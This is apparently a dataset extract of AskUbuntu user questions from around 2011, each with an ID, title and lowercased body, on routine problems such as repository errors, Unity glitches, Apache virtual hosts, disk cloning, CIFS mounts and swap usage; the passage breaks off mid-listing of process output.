51692	what should i do when the getdeb repository is down ?	i 'm trying to install programs/files from the getdeb repo but get a `` check your internet connection '' error . programs than i 've tried include qbittorrent and mozilla-plugin-vlc . through the terminal i get the following errors : err http : //archive.getdeb.net/ubuntu/ natty-getdeb/apps qbittorrent amd64 2.8.2-1~getdeb2 could not connect to archive.getdeb.net:80 ( 209.105.191.78 ) . - connect ( 113 : no route to host ) e : failed to fetch http : //archive.getdeb.net/ubuntu/pool/apps/q/qbittorrent/qbittorrent_2.8.2-1~getdeb2_amd64.deb : could not connect to archive.getdeb.net:80 ( 209.105.191.78 ) . - connect ( 113 : no route to host ) & err http : //archive.getdeb.net/ubuntu/ natty-getdeb/apps mozilla-plugin-vlc amd64 1.1.10-1~getdeb1 could not connect to archive.getdeb.net:80 ( 209.105.191.78 ) . - connect ( 113 : no route to host ) e : failed to fetch http : //archive.getdeb.net/ubuntu/pool/apps/v/vlc/mozilla-plugin-vlc_1.1.10-1~getdeb1_amd64.deb : could not connect to archive.getdeb.net:80 ( 209.105.191.78 ) . - connect ( 113 : no route to host ) i 'm not having any problems adding/removing other programs/files from my machine . is there a problem with getdeb repo ( and if so , is there any way to fix it on my end ) or is there something wrong with my computer 's configuration ?
51693	unity broken after attempted program install	i followed these ( http : //blog.mypapit.net/2011/05/howto-mining-bitcoin-in-ubuntu-using-opencl-py.html ) directions without any error and now the launch bar for unity is no longer displayed . can someone help ? unity -- reset results in the following error unity-panel-service : no process found backend : gconf integration : true profile : default adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 initializing bailer options ... done initializing detection options ... done initializing composite options ... done xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxcreatecontext failed compiz ( bailer ) - info : ensuring a shell for your session zaeb @ j0ker1 : ~ $ can not register the panel shell : there is already one running .
51697	how do i best clone an existing dual boot hhd to a new , larger hhd ?	i have a 160gb hhd running ubuntu 11.04 and windows xp , with the following partition configuration : sda1 windows ntfs ( primary-active and boot and system ) sda5 linux swap ( logical ) sda6 linux ubuntu ext3 ( root ) sda7 linux ubuntu ext3 ( home ) sda2 other i have grub2 installed , which provides me the choice at boot to start either ubuntu or xp . this currently works fine . i want to clone this hhd and transfer to a new , larger hhd , and have several questions , since i do n't want to make a mistake with something so crtical . 1 ) which software is generally considered the safest , most reliable and easiest to use ( dd , gddrescue , clonezilla , paragon , macrum reflect , easeus , drive image xml , or something else ) ? 2 ) which software will be able to copy and include both operating systems in the partitions to be cloned ? 3 ) will that software change the booting process or options in the cloned copy in any way ? i 've read where using easeus corrupts grub2 and thus requires re-installing grub2 ! are there any other concerns , considerations or factors i need to consider in cloning the hhd ; e.g . prior formatting an external hhd , and with what file system ? i 've also read where fat32 would be the choice , but do n't really know for sure . thanks . donofrij is offline reply with quote new reply
51698	can i manage ubuntu workstation through windows like local or global group policy ?	can i manage ubuntu workstation through windows like local or global group policy ? i was told likewise enterprise group policy could do it , are there any open source solution ( s ) we could try ?
51699	how to have the `` close '' , `` maximize '' and `` minimize '' buttons on the left in google-chrome in kde	i would like to achieve what i was able to do in ubuntu . i 've now switched to kde and would like to have the buttons on the left hand side . i have already set it for the `` native '' windows and they look like this : i would like to have this : on the other side ( left ) . thanks in advance !
51704	how to forward ports on the same ubuntu machine ? i want my webserver be available on 80 and 8880 port	how do i forward ports on the same ubuntu machine ? i want my webserver be available on 80 and 8880 port . or maybe i could making my apache listening not only on 80 port , but also on 8880 ? is that possible ?
51705	change default os setting linux ubuntu to windows	well i want to know how can i change my default os boot system setting . i installed ubuntu with window 7.my default os is ubuntu 11.4 . please tell me step by step i am new in linux world
51715	how do i start/stop mysql in xampp ?	i installed xampp . now the problems are i can not start mysql root @ ubuntu : / # sudo /opt/lampp/lampp startmysql xampp : starting mysql ... xampp : could n't start mysql ! i can not put my projects so i can test it /opt/lampp/htdocs/ root @ ubuntu : ~ # cp -r /home/sou/socialnetwork/* /opt/lampp/htdocs/socialnetwork cp : can not stat `/home/sou/socialnetwork/* ' : no such file or directory root @ ubuntu : ~ # cp -r /home/sou/socialnetwork/* /opt/lampp/htdocs/socialnetwork -bash : /home/sou/socialnetwork/* : no such file or directory -bash : /opt/lampp/htdocs/socialnetwork : no such file or directory cp : missing file operand try `cp -- help ' for more information . phpmyadmin can not work mysql said : documentation 2002 - the server is not responding ( or the local mysql server 's socket is not correctly configured ) connection for controluser as defined in your configuration failed . i just startted with ubuntu 1day ago , so i dont know the staffs required to start xampp properly . please guide me ! what i need to start/stop mysql to open the directory and copy required files to it to start phpmyadmin
51716	mozc does not work for qt applications	i installed ubuntu natty 2011.04 from scratch , and then mozc ( google 's ime , which i prefer to other options ) which provides japanese input . it works in all applications except qt-based applications like opera , anki , ksnapshot , ... how can i fix it , so that i can type japanese in qt/kde applications as well ?
51718	is there a website to check all media codecs ?	i 've installed ubuntu on the notebook of my sister and want to make sure that all media codecs work , so that she can surf on the internet and download media and everything will work . with media codecs i mean stuff like : flash , mpeg , avi , quicktime , real , mp3 , wma , ogg , m3u , all kind of stream codecs . wondering if there is such a site on the web . thanks in advance
51719	how to start deluge minimised , only with a tray ( notification area ) icon ?	i would like deluge to start upon each startup , so i put deluge-gtk in startup applications . now there is the window appearing each time , and i would like that it starts minimised , only with the notification area icon . is there a way to do that ? seems that before it could be set in the preferences , and there was also a command line string to do it , but these features are gone .
51720	how to open tcp port 7777 in control panel ?	i am initiating file transfer using tcp on openfire server . but i am not able to open the port number 7777 , from which i need to send files . i changed the security setting in the admin console panel of the aws . but still when i tried to send the files i am getting the error . i tried to change the custom tcp rules , by opening only the 7777 port . but still i am not able to resolve it . kindly help .
51725	how can i stream music i have in my ubuntu one account to subsonic in my android smartphone ?	how can i stream music i have in my ubuntu one account to subsonic in my android smartphone ? the android subsonic app asks me for : server address username password i want to use my ubuntu one subscription to stream my music . what information do i have to enter in that fields ? subsonic have an option to test connection but it is n't working with the data i populate that fields .
51726	how to restore delete key functionality ?	i am in ubuntu 10.10 . i am also using compiz fusion for animation . my delete key is not deleting any text . when i press delete , my currently opened window moves to first ubuntu desktop/workspace . i think some program has bound this key . how can i determine if this is the case ? alt + ctrl + delete is working fine . how do i restore the delete key 's default functionality ? best regards .
51728	how to get this window with gnome 3 ?	how can i get this window in ubuntu 11.04 with gnome 3 ?
51733	anyone can name a wimax usb dongle that works with 10.04 ?	i need to find a wimax usb dongle that works on ubuntu ( driver support ) . i google for it but could not come up with any up to date information . i wonder if anyone can tell from experience that model-xyz works smoothly , or tell how one was able to get modelxyz to work under ubuntu .
51734	system never finishes booting	i 'm using ubuntu 10.10 dual boot with xp . i planned to increase the size of swap partition . so i delete the swap partition . and i move the partition right so that swap partition can get 2 gb . then i shutdown the system without editing the appropriate uuid for swap in `` /etc/fstab '' file . so when i start the computer it said `` continue to wait ; press s to skip ; press m to manual ... something '' . but it does not respond for any thing ( for pressing s or m ) .using live cd i resize and formatted the raw partition to linux-swap with gparted partition editor.the fstab file looked different in live cd so i tried recovery mode of ubuntu.there i edited the fstab file with correct uuid for swapping.after i reboot the system it never finishes bootingin the output of fdisk command the start sector ( or block i do n't know what it is ) of swap partition is same as end value of consecutive partition.so i made some space between swap partition and next partition ( which is ntfs partion and not a system partition ) . i have updated the uuid in fstab file.but it is again booting up continuously or infinitelywhat might be the problem ? how to get rid of this ? the output of the fdisk command $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x022c022b device boot start end blocks id system /dev/sda1 * 1 6374 51199123+ 7 hpfs/ntfs /dev/sda2 6375 60800 437176814+ f w95 ext 'd ( lba ) /dev/sda5 6375 21672 122881153+ 83 linux /dev/sda6 21690 40659 152367104 7 hpfs/ntfs /dev/sda7 40929 60800 159614976 7 hpfs/ntfs /dev/sda8 40664 40925 2097152 82 linux swap / solaris partition table entries are not in disk order in live cd $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' f8f81fd0f81f8c4e '' type= '' ntfs '' /dev/sda5 : uuid= '' b6768343-075c-44a5-8229-4070a80d2d49 '' type= '' ext4 '' /dev/sda6 : label= '' entertainment '' uuid= '' 7630a95430a91c5d '' type= '' ntfs '' /dev/sda7 : label= '' label1 '' uuid= '' 9414a64f14a63460 '' type= '' ntfs '' /dev/sda8 : uuid= '' 1993033c-a261-4506-8520-2b5ff9fd9a60 '' type= '' swap '' i can start the ubuntu in recovery mode . i 've mounted the filesystem located in the hard drive at mount point /mnt . the kern.log file ( /mnt/var/log/kern.log ) content is in pastebin.the link is kern.log the fstab file ( /mnt/etc/fstab ) content is fstab i pressed break key while splash screen is showing.it shows this line : ( process:311 ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) then some messages repeated thrice.i again pressed break key the splash screen shown again.after few minutes when i pressed break key that messages repeated more . i 've noted and it is here.some texts can be missing there . fsck from util-linux 2.17.2 /dev/sda5 : clean , 191939/7684096 files , 5176534/30720288 block * starting apparmor profiles skipping profile in /etc/apparmor.d/disable : usr.bin.firefox [ ok ] *setting sensors limits [ ok ] *not starting jetty-edit /etc/default/jetty and change no_start to be 0 ( or comment it out ) speech dispatcher disable : edit /etc/default/speech-dispatcher *pulse audio ( ... ... some thing ... ... ) saned disable ( ... ... some thing ... ... ) * enabling edit executable binary format bin fmt-super [ ok ] *checking battery state ... [ ok ]
51739	are there any issues creating a tmpfs mount when my root partition is a raid5 array	i have a new ubuntu 11 server install created per the wiki with the following partitions : md1 : active raid5 sdc5 [ 2 ] sda5 [ 0 ] sdb5 [ 1 ] 1935813632 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/3 ] [ uuu ] md2 : active raid5 sdb6 [ 1 ] sdc6 [ 2 ] sda6 [ 0 ] 16722944 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/3 ] [ uuu ] md0 : active raid1 sda1 [ 0 ] sdc1 [ 2 ] ( s ) sdb1 [ 1 ] 487412 blocks super 1.2 [ 2/2 ] [ uu ] unused devices : < none > / is mounted at md1 , md2 is swap and md3 is /boot . i would like to create a tmpfs for /tmp which i probably should have done at install time , but i 'm wondering if there is any issue doing it now , considering that its parent is a raid array ? also , what process would you recommend for creating the tmpfs ?
51741	how to setup a virtual host for local development	ubuntu 11.04 installed with apache2 and all the relevant packages installed . i have tried most of the blogs and made google and other forums my best friends , yet i 'm unable to solve this issue . i need to set up a named virtual host on my local system for development . i created the directory `` vivek '' in /var/www and copied the default index.html and edited some elements . i added the file vivek.com in /etc/apache2/sites-available as follows : # ensure that apache listens on port 80 listen 80 # listen for virtual host requests on all ip addresses namevirtualhost *:80 < virtualhost *:80 > servername www.vivek.com documentroot /var/www/vivek # other directives here < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/vivek/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > i.e i 've added these following lines # ensure that apache listens on port 80 listen 80 # listen for virtual host requests on all ip addresses namevirtualhost *:80 < virtualhost *:80 > servername www.vivek.com documentroot /var/www/vivek # other directives here < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/vivek/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > to the default file which was already present in `` sites-available '' folder ( took the back up of default file before editing it ) added this in the hosts file present in /etc/hosts 127.0.0.1 localhost 127.0.1.1 vivek-pc 127.0.0.1 www.vivek.com performed the following operations with no errors : root @ vivek-pc : ~ # a2ensite vivek.com enabling site vivek.com . run '/etc/init.d/apache2 reload ' to activate new configuration ! root @ vivek-pc : ~ # /etc/init.d/apache2 reload * reloading web server config apache2 when i entered www.vivek.com , it gave me the default index.html in /var/www but not one present in the folder /var/www/vivek which is edited . later , i edited the index.html from /var/www but i was still getting the same index.html ( default-before editing ) . all the index.htmls have been edited but apache seems to have some hidden one which keeps coming up when i request for www.vivek.com and the ironic thing is after i restart -- apache came up fine but my site -- www.vivek.com failed to show up ( even with the index.html which is hidden god knows where ! ! ) .. now my browser is showing `` unable to connect `` please help.i 've been trying to set this up since a week with no successful result .
51742	move emblems and notes with copy	when i copy and transfer emblems and notes which i created on directory 's to my friend they are not going with it . is is possible to move them with copy ? if it is yes how can i move emblems and notes with copy between two ubuntu machines ?
51743	how do i compile a kernel module ?	a good man on networkmanager mailinglist provided a patch that hopefully would solve an issue i 'm experiencing related to slow mobile broadband detection on ubuntu 11.04 64-bit . i 'd really like to check the patch but i ca n't figure out how to do this . as a starting point i have uncompressed /usr/src/linux-source-2.6.38/linux-source-2.6.38.tar.bz2 and applied the patch to /usr/src/linux-source-2.6.38/drivers/usb/serial/options.c , but now i 'm stuck . how do i recompile the module ? possibly just the module , not the whole kernel and the other unmodified modules . links to good docs are appreciated as well . i already reconfigured and recompiled a kernel in the past ( though the procedure looked a bit obscure to me ... ) so all the involved software should be in place . thanks for any clarification .
51745	how do i make vlc handle videos in firefox instead of totem ?	some websites that use windows media does not work when using totem as a player , but people have told me that replacing totem with vlc in firefox can sometimes make things work . so the question becomes : how do i replace totem with vlc as a video handler in firefox ?
51752	expose-like spread mode in unity 2d without compiz	i 'm using ubuntu 11.04 with unity-2d but without compiz because my computer has a two-screen setup . i 'd like to know if there 's any way of having a view of all active applications running like mac os x ' expose feature . super+w does n't work on unity-2d , which is a recognized bug . i 've noticed some related topics ( for example : can unity display a launcher icon for spread mode ? ) but all are based on compiz and therefore are not relevant for me . does anyone has a clue on how to do this whithout compiz ? thanks for your help edern
51753	problem mount error 13 trying to mount nas share	i am trying to mount a nas share to my ubuntu 11.04 . this is my first ever linux machine , so everything is totaly new for me . i can access the shares from my windows at : \192.168.0.9\packages ( packages is the share name on the nas machine ) i can also mount ( or at least i see the packages icon on the desktop while going through places ) to the packages share . however , i want to mount packages to my \home\administrator\packages and here is the problem trying the following command : sudo mount -t cifs //192.168.0.9/packages/ \home\administrator\packages throws error : mount error ( 13 ) permission denied . i am putting in my password for the administrator when prompted . ( no note - i have likewise to add the ubuntu to the ad ) i than tried to add the -o username : administrator , password : password but got the same error . i have isntalled smbfs lready , but do n't think that this is the problem sudo apt-get install smbfs i will appreciate any help i also tried mount.cifs //192.168.0.9/packages /home/administrator/packages -o dom=domain , user=administrator , pass=password this gives mount error ( 1 ) : operation not permitted
51756	when ipv6 connectivity is broken , what 's the best option : disabling ipv6 vs installing miredo ?	i 've finally found why my google chrome is so slow . and i 've found these 2 posts . the first on google chrome forum and the second one here . the solution suggested in the second post requires a modification of /etc/modprobe.d/aliases , but on my ubuntu 11.04 i do n't have such a file . none of the resources i found would work on 11.04 . can anyone use anything that has worked and which is easily revertible ? below are the result of dig aaaa he.net and dig a he.net joseph @ joseph-off-lap : ~ $ dig aaaa he.net ; < < > > dig 9.7.3 < < > > aaaa he.net ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 15618 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 5 , additional : 7 ; ; question section : ; he.net . in aaaa ; ; answer section : he.net . 58616 in aaaa 2001:470:0:76 : :2 ; ; authority section : he.net . 2031 in ns ns2.he.net . he.net . 2031 in ns ns3.he.net . he.net . 2031 in ns ns4.he.net . he.net . 2031 in ns ns5.he.net . he.net . 2031 in ns ns1.he.net . ; ; additional section : ns1.he.net . 2044 in a 216.218.130.2 ns2.he.net . 2044 in a 216.218.131.2 ns2.he.net . 73027 in aaaa 2001:470:200 : :2 ns3.he.net . 2044 in a 216.218.132.2 ns3.he.net . 62719 in aaaa 2001:470:300 : :2 ns4.he.net . 2044 in a 216.66.1.2 ns4.he.net . 62719 in aaaa 2001:470:400 : :2 ; ; query time : 134 msec ; ; server : 80.87.78.4 # 53 ( 80.87.78.4 ) ; ; when : mon jul 4 17:02:33 2011 ; ; msg size rcvd : 290 joseph @ joseph-off-lap : ~ $ dig a he.net ; < < > > dig 9.7.3 < < > > a he.net ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 31069 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 5 , additional : 7 ; ; question section : ; he.net . in a ; ; answer section : he.net . 58533 in a 216.218.186.2 ; ; authority section : he.net . 1948 in ns ns4.he.net . he.net . 1948 in ns ns5.he.net . he.net . 1948 in ns ns1.he.net . he.net . 1948 in ns ns2.he.net . he.net . 1948 in ns ns3.he.net . ; ; additional section : ns1.he.net . 1961 in a 216.218.130.2 ns2.he.net . 1961 in a 216.218.131.2 ns2.he.net . 72944 in aaaa 2001:470:200 : :2 ns3.he.net . 1961 in a 216.218.132.2 ns3.he.net . 62636 in aaaa 2001:470:300 : :2 ns4.he.net . 1961 in a 216.66.1.2 ns4.he.net . 62636 in aaaa 2001:470:400 : :2 ; ; query time : 190 msec ; ; server : 80.87.78.4 # 53 ( 80.87.78.4 ) ; ; when : mon jul 4 17:03:56 2011 ; ; msg size rcvd : 278 below are the result for ping and ping6 joseph @ joseph-off-lap : ~ $ ping -c 5 he.net ping he.net ( 216.218.186.2 ) 56 ( 84 ) bytes of data . 64 bytes from he.net ( 216.218.186.2 ) : icmp_req=1 ttl=45 time=277 ms 64 bytes from he.net ( 216.218.186.2 ) : icmp_req=2 ttl=45 time=275 ms 64 bytes from he.net ( 216.218.186.2 ) : icmp_req=3 ttl=45 time=277 ms 64 bytes from he.net ( 216.218.186.2 ) : icmp_req=4 ttl=45 time=275 ms 64 bytes from he.net ( 216.218.186.2 ) : icmp_req=5 ttl=45 time=275 ms -- - he.net ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 21209ms rtt min/avg/max/mdev = 275.675/276.405/277.621/0.995 ms joseph @ joseph-off-lap : ~ $ ping6 -c 5 he.net connect : network is unreachable joseph @ joseph-off-lap : ~ $ as suggested i 'm leaning towards installing miredo .is there any configurations/tweaks to make it works ? what would you say about disabling ipv6 vs installing miredo ? thanks for reading this . ; )
51758	i have slow video acceleration , is there any way to fix this ?	i have a an x700 mobility , and ca n't seem to find the drivers . i have the default gallium drivers , but i would like to have proprietary drivers . is there any way to do this on 11.04 ?
51761	unity / compiz problem after update from xorg ppa	after update from xorg ppa ( ppa : xorg-edgers/ppa ) i have many problems with unity shell / compiz . preview of moving icons is broken and gtk theme of unselected windows breaks . video : http : //www.youtube.com/watch ? v=barr1osssd0 video card : intel gma965 system : ubuntu 11.04 kernel : 2.6.39-3 - present my old kernels : 2.6.38-8 - the same problem 2.6.38-10 - the same problem sorry for my english .
51763	how to get webcam to automatically remount after being dumped ?	i have a webcam ( logitech c250h ) that periodically gets dumped ( automatically disconnected without being unplugged ) , which then means i have to unplug it and then plug back in to get it to work again . i think it has to do with something about how the webcam is usb 2.0 but my pc is usb 1.0 , even though my pc says it has usb 2.0 . in windows it would also dump it but then it would automatically remount it . is there a way to do this in ubuntu ?
51765	installing ubuntu again	i installed ubuntu last week on my computer . the way i did it was creating a partition on my hdd and then i used the windows installation of ubuntu to installed there . after i did it , i restart my computer and try to boot ubuntu , but it did not work . so i tried to go into my windows 7 boot again . on the booting process i got the message that my computer crash or had some kind of error so i choose the option to recover my system from a rally point , after i did it ; the partition that i created was gone . so i turned my computer of and turned it on to see if the dual boot screen was gone , but it was still there . after that i tried many different was to erase the dual boot . i also tried to install ubuntu again , but the installer is not letting me do it because the file of wubi still in my system . i would like to know if some can help me with this , so i can erase those files , and install ubuntu again on my computer . i have windows 7 64-bit
51768	what is a `` mono wrapper '' ?	i am a linux enthusiast with some very basic programming experience and i am currently trying to set up a touch surface interface using microsoft 's kinect and simple kinect touch software . i am in the process of building the software and was just wondering if anyone could tell me what a `` mono wrapper '' is . the readme file tells you that it is optional to install this with the software but i am curious none the less : p. thanks in advance !
51775	script using sed adds an `` e '' to the output files	i have a script that adds a new user and creates a virtual host for the users domain name . the script works great with one exception ... in /etc/apache2/sites-available/ all of my virtual host files have two copies , one with an e and one without . i believe my issue lies when i use the sed command . can i get a second opinion ? here is the script : # set the working directory dir= $ ( pwd ) # request the new domain name printf `` enter the new domain name , without the www ( i.e newdomain.com ) : \n '' read newdomain # request the new username printf `` enter the new username ( i.e newusername ) : \n '' read username # create the new user sudo adduser $ username # copy the virtual host to sites-available sudo cp /templates/domain-vhost /etc/apache2/sites-available/ $ newdomain # echo results echo `` successfully created the virtual host file at : /etc/apache2/sites-available/ $ newdomain.. '' # change the domain name in the virtual host file sudo sed -ie `` s/newdomainname/ $ newdomain/ '' /etc/apache2/sites-available/ $ newdomain # echo results echo `` modified the virtual host to reflect the new domain : $ newdomain.. '' # change the directory path in the virtual host sudo sed -ie `` s/newusername/ $ username/ '' /etc/apache2/sites-available/ $ newdomain # echo results echo `` successfully modified the new virtual host file.. '' # enable the site with apache cd /etc/apache2/sites-available/ sudo a2ensite $ newdomain # echo results echo `` successfully enabled the $ newdomain.. '' # change to previous working directory cd $ dir # reload apache sudo /etc/init.d/apache2 reload # notify user of action echo `` finished creating the new domain , $ newdomain , and restarted apache.. ''
51776	bind alt-n to nth window in byobu/screen	i 've been trying to bind a shortcut to switching to a specific window in byobu , but i 'm not having success . i wanted to bind alt- ( screen 's number ) but it 's not working . i think i 'm using the wrong ascii codes . take alt-1 for example : i 've tried using the lines bind \078 select 1 and bind \78 select 1 to both ~/.screeenrc and ~/.config/byobu/keybindings , but neither worked . am i using the wrong code , or is there no standard ascii code for alt-1 ?
51777	can we have mac like 'labels ' on gnome ?	can we some how use color labels on icons like os x ? ? something like this :
51779	my unity button is missing when connecting to external display ( hdmi ) . help ?	every time i connect to an external display , like hdmi , the unity button on the top left would just disappear . after i disconnect , it would just pop back in . is there a fix ? restarting it with a unity -- replace does n't help .
51782	creating a bounty fund for unity developers	can canonical and the ubuntu community create a bounty fund , as a single pool of money , to encourage more developers to contribute to unity . i 'd suggest canonical starting it off by funding a bounty pool , where fixing 1 bug counts as 1 share of the sum of money . the ubuntu community could then contribute additional funds if they wish . i 'd suggest the following procedure : developers need to complete one bite-sized bug to be eligible . completing ( i.e . the bug is marked as âfix committedâ ) a non bite-sized bug gets the developer one share of the bounty pool . more complex bugs could carry additional weighting and count as 2 or more shares . developers who 've already completed bugs get one share per bug completed to start with , therefore rewarding them for their contribution . i think this would encourage more developers to join in unity development and give existing developers further incentive to fix more bugs . it also provides a way for non-developers to feel they are helping with the software development . no specifications would need to be written up . if this or something similar could be made to work for unity , it should also work for other open source software , e.g . libreoffice , mozilla thunderbird & lightning , etc . which would give a much needed boost to open source on the desktop .
51783	trouble connecting to ubuntuone and restoring files	after upgrading to 11.04 , i reloaded 10.10 . when i went to sync and restore my files all i have is my old directory structure empty of my files . i had go to ubuntuone to find the file i want and download the file . when i run my desktop ubuntuone never connects , i do have an active restart button which does nothing . is there and easier way to retrieve files from ubuntuone or i am better off saving my files to a thumb drive .
51784	unity tray panel shows icon as split into two	i am running default ubuntu unity , never changed any theme . and this has happened by itself , first for a single icon , then for all . i tried rebooting thinking the ati drivers might have gone nuts and reloading everything should work fine but it did n't . one thing to add is that when i open up any dropdown , that menu icon is shown fine as long as the dropdown is open .
51785	swap shoots to 100 % after a couple of hours of usage	for some reason or another , my swap usage will peak to 100 % capacity after a couple hours of usage . my interface will then freeze , after which i have to wait 20 minutes time to be able to even move the mouse . the current suspected culprit is chromium or xchat as these are always present when this issue occurs . i 'm leaning more towards xchat as i 've previously noticed the freeze starting right around the time when i click on something related to xchat . among the other things i 've noticed is the swap usage will build up over time . i 've also had emesene and dropbox open , but i doubt they 're the root cause of the issue as they 're just idling when the interface freezes . rebooting is currently my only fix at the moment , ( that i can find anyway ... ) but if the interface did n't completely stop working , in that case it would be a hard reset . also when the swap is full , the hdd light is constantly on . edit : found some additional information . here 's the output of free -m : total used free shared buffers cached mem : 3760 3653 107 0 4 2638 -/+ buffers/cache : 1010 2750 swap : 3890 2643 1247 as you can see , the physical memory is cached for some reason , while the free ones are relatively small . i think this is causing the swap usage . i need this fixed as i currently need to shutdown every 2 days . thanks update : as per request /etc/fstab uuid=20fab2bb-2424-40b0-ae2b-74693ea83f45 / ext4 errors=remount-ro , user_xattr 0 1 # swap was on /dev/sda5 during installation uuid=e04c1c74-9b99-4f07-8d3c-f0d6e8d3c465 none swap sw 0 0 update : ps -aux info user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 24144 1968 ? ss jul11 0:02 /sbin/init root 2 0.0 0.0 0 0 ? s jul11 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s jul11 0:00 [ ksoftirqd/0 ] root 6 0.0 0.0 0 0 ? s jul11 0:00 [ migration/0 ] root 17 0.0 0.0 0 0 ? s < jul11 0:00 [ cpuset ] root 18 0.0 0.0 0 0 ? s < jul11 0:00 [ khelper ] root 19 0.0 0.0 0 0 ? s < jul11 0:00 [ netns ] root 21 0.0 0.0 0 0 ? s jul11 0:00 [ sync_supers ] root 22 0.0 0.0 0 0 ? s jul11 0:00 [ bdi-default ] root 23 0.0 0.0 0 0 ? s < jul11 0:00 [ kintegrityd ] root 24 0.0 0.0 0 0 ? s < jul11 0:00 [ kblockd ] root 25 0.0 0.0 0 0 ? s < jul11 0:00 [ ata_sff ] root 26 0.0 0.0 0 0 ? s jul11 0:00 [ khubd ] root 27 0.0 0.0 0 0 ? s < jul11 0:00 [ md ] root 30 0.0 0.0 0 0 ? s jul11 0:00 [ khungtaskd ] root 31 0.0 0.0 0 0 ? s jul11 0:05 [ kswapd0 ] root 32 0.0 0.0 0 0 ? sn jul11 0:00 [ ksmd ] root 33 0.0 0.0 0 0 ? sn jul11 0:00 [ khugepaged ] root 34 0.0 0.0 0 0 ? s jul11 0:00 [ fsnotify_mark ] root 35 0.0 0.0 0 0 ? s jul11 0:00 [ ecryptfs-kthr ] root 36 0.0 0.0 0 0 ? s < jul11 0:00 [ crypto ] root 40 0.0 0.0 0 0 ? s < jul11 0:00 [ kthrotld ] root 43 0.0 0.0 0 0 ? s < jul11 0:00 [ kmpathd ] root 44 0.0 0.0 0 0 ? s < jul11 0:00 [ kmpath_handle ] root 273 0.0 0.0 0 0 ? s jul11 0:00 [ scsi_eh_0 ] root 274 0.0 0.0 0 0 ? s jul11 0:00 [ scsi_eh_1 ] root 275 0.0 0.0 0 0 ? s jul11 0:00 [ scsi_eh_2 ] root 276 0.0 0.0 0 0 ? s jul11 0:00 [ scsi_eh_3 ] root 277 0.0 0.0 0 0 ? s jul11 0:01 [ 